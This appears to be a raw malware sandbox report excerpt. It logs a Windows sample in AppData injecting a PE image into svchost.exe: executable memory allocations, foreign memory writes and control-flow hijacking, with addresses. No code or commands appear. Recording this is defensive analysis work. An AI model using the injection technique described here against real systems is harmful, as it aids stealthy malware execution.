Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EE20000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EE30000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 140000000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 140000000 protect: page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 140001000 protect: page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 140019000 protect: page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 140020000 protect: page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 140021000 protect: page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 140023000 protect: page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF50000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF40000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1DD0EF50000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F28A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F28B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 140000000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 140000000 protect: page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 140001000 protect: page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 140019000 protect: page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 140020000 protect: page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 140021000 protect: page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 140023000 protect: page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 159F29D0000 protect: page execute and read and write	Jump to behavior

Hijacks the control flow in another process

Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: PID: 1984 base: 140020000 value: FF			Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: PID: 5496 base: 140020000 value: FF			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140000000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140000000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EE20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EE30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF67E6D5080	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140000000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140001000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140001000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140020000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140020000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140021000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140021000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140023000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140023000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140024000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140024000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EE30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EE30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019180	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019188	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019190	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019198	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1400191A0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1400191A8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1400191B0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1400191B8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1400191C0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1400191C8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1400191D0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1400191D8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1400191E0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1400191E8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1400191F0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1400191F8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019200	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019208	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019210	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019218	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019220	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019228	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019230	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019238	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010	Jump to behavior
